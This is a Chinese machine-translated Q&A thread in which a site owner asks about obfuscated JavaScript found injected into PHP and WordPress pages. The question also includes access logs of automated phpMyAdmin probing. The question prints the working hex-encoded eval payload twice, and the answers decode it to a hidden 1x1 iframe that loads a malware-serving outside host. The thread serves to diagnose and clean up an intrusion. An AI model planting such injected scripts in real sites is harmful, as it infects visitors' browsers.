这是一个可能的黑客攻击？

Question

有一天，我的Q &我的网站的一部分出现故障，因此我关闭索引，发现错误与语法错误有关。所以我抹去了它并使它死亡。然而，当我打开一看，我发现：

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>httpdocs/');<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script> 

我发现它以后在多个PHP网站（如WordPress的指数），我想知道的是，如果有人知道它来自哪里，什么它的目的是。

我发现这个在我的日志也一样，它看起来可疑：

87.106.166.95 - - [19/Jul/2011:00:03:14 +0400] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:15 +0400] "GET //phpadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:17 +0400] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 301 547 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 301 547 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 301 539 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:19 +0400] "GET //web/phpMyAdmin/scripts/setup.php  HTTP/1.1" 301 550 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //web/scripts/setup.php HTTP/1.1" 301 539 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:21 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:23 +0400] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 301 548 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //sqlmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:25 +0400] "GET //mysqlmanager/scripts/setup.php HTTP/1.1" 301 548 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //p/m/a/scripts/setup.php HTTP/1.1" 301 541 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //PMA2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:27 +0400] "GET //pma2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //phpmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //php-myadmin/scripts/setup.php HTTP/1.1" 301 547 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:29 +0400] "GET //phpmy-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //webadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //sqlweb/scripts/setup.php HTTP/1.1" 301 542 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:31 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //webdb/scripts/setup.php HTTP/1.1" 301 541 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //mysql-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //databaseadmin/scripts/setup.php HTTP/1.1" 301 549 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:34 +0400] "GET //admm/scripts/setup.php HTTP/1.1" 301 540 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:35 +0400] "GET //admn/scripts/setup.php HTTP/1.1" 301 540 "-" "-" 

Answer 1

是的，看起来像黑客攻击你的网站后，混淆恶意代码的常用方法。它可以做许多事情，并且经常链接到中央服务器，以便其后续行为可以被修改。

要确定此代码的功能，我们只需要运行它，用console.log代替eval。这打印出来

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>') 

该网站的网址和内容是试图掩盖其目的。它目前服务的页面被进一步混淆。我有expanded the code, here。它似乎看着您的浏览器和插件的版本，将病毒定位到您的访问者。

有很多爬虫在网上寻找易受攻击的软件版本，并自动黑客入侵。通常尝试追踪它们并不是很简单或富有成效;只关注下一次更安全。

Answer 2

它来自黑客。

它的目的是要破解你。

删除它，并升级你的防御。

Answer 3

是的，有人获得了访问权限并插入了该权限。其加密的JavaScript来修改页面。找出实际发生的事情的一个简单方法是用console.log（）或alert（）替换eval（），它会给你代码。

我已经做了，这是什么样的代码添加到页面：

<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe> 

Answer 4

这是代码通过一个漏洞在任何WordPress的，插件注入到这些网站，或其他应用程序在服务器上运行。

该代码，当去模糊化收益率：

document.write('<iframe src="http://xxx/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>') 

如果你改变了eval为console.log（我已经编辑了安全;-)域）

Answer 5

，你

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>') 

该论坛发帖现在已被删除，所以它实际上不会做任何事情，但是，您已被黑客入侵。